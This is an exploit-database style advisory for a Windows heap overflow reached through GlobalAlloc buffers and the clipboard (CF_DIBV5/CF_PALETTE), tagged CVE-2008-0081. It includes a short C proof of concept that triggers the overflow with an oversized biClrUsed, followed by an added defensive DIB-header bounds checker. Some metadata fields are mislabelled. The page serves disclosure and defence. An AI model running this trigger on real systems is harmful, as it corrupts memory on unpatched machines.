Vendor: Windows
By: Ragestorm
CVSS: 9.3 (CRITICAL)
Heap Overflow
CWE: 119
Product Name: Windows
Affected Version From: Windows 2000
Affected Version To: Windows Server 2008
Patch Exists: YES
Related CWE: CVE-2008-0081
CPE: o:microsoft:windows
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

GlobalAlloc() Heap Overflow in Windows

A heap overflow vulnerability exists in Windows and is reachable through memory allocated with the GlobalAlloc() function. An attacker can exploit this vulnerability by placing a malicious BITMAPINFOHEADER structure in a GlobalAlloc() buffer and passing that buffer to the clipboard, as the proof of concept below does, which can lead to a heap overflow. This vulnerability is tracked by CVE-2008-0081 and is rated as critical with a CVSS score of 9.3.

Mitigation:

Microsoft has released a patch to address this vulnerability.

Exploit-DB raw data:

// source: http://www.ragestorm.net/blogs/?p=255
// source: http://secunia.com/advisories/40870/

DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0x200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0x1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();

OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);
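
A defensive counterpart to the proof of concept above, added here as an example and not taken from the original page, from Microsoft's patch or from Ragestorm's code: a bounds check on an untrusted DIB header, run before anything sizes a palette from biClrUsed. The dib_header struct, dib_check() and its status codes are hypothetical names, and the 256-entry cap for depths above 8 bpp is a policy choice of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Mirror of the 40-byte BITMAPINFOHEADER layout, declared here (assumption of
   this example) so it builds without <windows.h>. */
typedef struct {
    uint32_t biSize; int32_t biWidth, biHeight;
    uint16_t biPlanes, biBitCount;
    uint32_t biCompression, biSizeImage;
    int32_t  biXPelsPerMeter, biYPelsPerMeter;
    uint32_t biClrUsed, biClrImportant;
} dib_header;

enum dib_status { DIB_OK, DIB_TRUNCATED, DIB_BAD_SIZE, DIB_BAD_DEPTH,
                  DIB_PALETTE_TOO_LARGE, DIB_PALETTE_OUT_OF_BOUNDS };

/* Hypothetical helper: validate an untrusted DIB header held in buf_len bytes
   before any code sizes or copies a palette based on biClrUsed. */
enum dib_status dib_check(const void *buf, size_t buf_len, uint32_t *colors)
{
    dib_header h;
    if (buf_len < sizeof h) return DIB_TRUNCATED;
    memcpy(&h, buf, sizeof h);              /* no unaligned reads */
    if (h.biSize < sizeof h || h.biSize > buf_len) return DIB_BAD_SIZE;
    switch (h.biBitCount) {
    case 1: case 4: case 8: case 16: case 24: case 32: break;
    default: return DIB_BAD_DEPTH;
    }
    /* At most 2^bpp entries for palettised depths; the 256 cap above 8 bpp is
       this example's policy. biClrUsed == 0 means the full table. */
    uint32_t max = h.biBitCount <= 8 ? 1u << h.biBitCount : 256u;
    uint32_t n = (h.biClrUsed == 0 && h.biBitCount <= 8) ? max : h.biClrUsed;
    if (n > max) return DIB_PALETTE_TOO_LARGE;
    /* The colour table (4-byte RGBQUAD entries) must fit inside the buffer. */
    if ((size_t)n * 4 > buf_len - h.biSize) return DIB_PALETTE_OUT_OF_BOUNDS;
    *colors = n;
    return DIB_OK;
}

int main(void)
{
    /* Constructed input: the PoC's biClrUsed in a 0x1000-byte buffer, with
       biSize and biBitCount filled in so the palette check is reached. */
    unsigned char buf[0x1000] = {0};
    dib_header h = {0}; uint32_t n = 0;
    h.biSize = sizeof h; h.biBitCount = 8; h.biClrUsed = 0x200;
    memcpy(buf, &h, sizeof h);
    printf("status=%d\n", (int)dib_check(buf, sizeof buf, &n));
}
```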